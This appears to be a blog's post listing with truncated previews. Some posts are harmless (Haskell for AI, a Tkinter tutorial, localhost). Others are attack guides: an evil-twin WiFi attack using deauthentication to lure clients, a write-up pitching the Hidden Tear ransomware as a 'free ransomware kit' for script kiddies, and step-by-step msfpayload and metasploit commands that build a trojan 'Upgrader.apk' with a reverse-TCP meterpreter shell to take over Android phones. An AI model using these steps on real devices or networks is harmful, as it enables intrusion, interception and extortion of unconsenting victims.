Posts

wifi attack with kali linux

Image
Prerequisites Kali Linux Prior experience with wireless hacking You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. No big deal- apt-get install bridge-utils Objectives The whole process can be broken down into the following steps- Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng for finding necessary info about the network, and  airbase-ng to create it's twin . Forcing the client to disconnect from the real AP and connecting to yours. We'll use aireplay-ng to deauthenticate the client, and strong signal strength to make it connect to our network. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have i...

best programming languages used in Artifical Intelligence

Image
7. Haskell Haskell in strong static typing, non-strict programming language developed in 1990. Since there are not many Haskell developers, private companies are reluctant to try Haskell. One thing that Haskell is perfect at is abstraction (abstract mathematics, not like Java OOP). It allows expressive and efficient libraries express AI algorithms. For example, HLearn that uses well known algebraic structure (modules, monoids, etc.) to express and boost the speed of simple machine learning algorithms. Although, you can write these algorithms in any language, Haskell makes them more expressive than others, while maintaining decent performance. For instance,  faster cover trees  written in Haskell. Haskell supports embedded domain-specific languages, which is a famous area of programming language research, applicable to a large number of domains including artificial intelligence. Specifically, it is good host for probabilistic programming...

How to make a ransomware - HIDDEN TEAR

A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub . The Ransomware dubbed Hidden Tear , uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up. The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware. Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people. The Hidden Tear — Free Ransomware Kit The " Hidden Tear " Ransomware package consists of four files namely: Hidden-Tear-Decrypter Hidden-Tear .gitignore README.md Hidden Tear Ransomware is capable of : Using AES algorithm to encrypt files Sending encryption key to a server Encrypting files...

tkinter GUI full

Image
Tk button with onClick event To create a Tkinter window with a button use the example below.  The program enters mainloop()  which wait for events (user actions). We define the button which has a callback to the function callback().   master is the root window, the window where your button will appear in. from Tkinter import *   master = Tk ( )   def callback ( ) : print "click!"   b = Button ( master , text = "OK" , command = callback ) b. pack ( )   mainloop ( ) tk button Tk image button If you want an image button, use the PhotoImage class. We set the size of the window and the miminum size with the functions minsize() and geometry(). Example: from Tkinter import *   master = Tk ( ) master. minsize ( 300 , 100 ) master. geometry ( "320x100" )   def callback ( ) : print "click!"     photo = PhotoImage ( file = "add.png" ) b = Button ( master , image = photo , command = callback , he...

what is localhost?

In computer networking , localhost is a hostname that means this computer . It is used to access the network services that are running on the host via its loopback network interface. Using the loopback interface bypasses any local network interface hardware. The local loopback mechanism is useful for testing software during development, independently of any networking configurations. For example, if a computer has been configured to provide a website , directing a locally running web browser to http://localhost may display its home page. On most computer systems, localhost resolves to the IP address 127.0.0.1, which is the most commonly used IPv4 loopback address, and to the IPv6 loopback address ::1. [1] The name localhost is also a reserved top-level domain name , set aside to avoid confusion with the definition as a hostname. [2] The IETF standards restrict domain name registrars from assigning the name localhost in registration procedures, such as for sec...

HOW TO Hack Android Using Kali (Remotely)

Image
Step 1 Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/ Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2 Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3  Set-Up a Listener: After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) Step 4 Exploit! At last type: exploit to start the...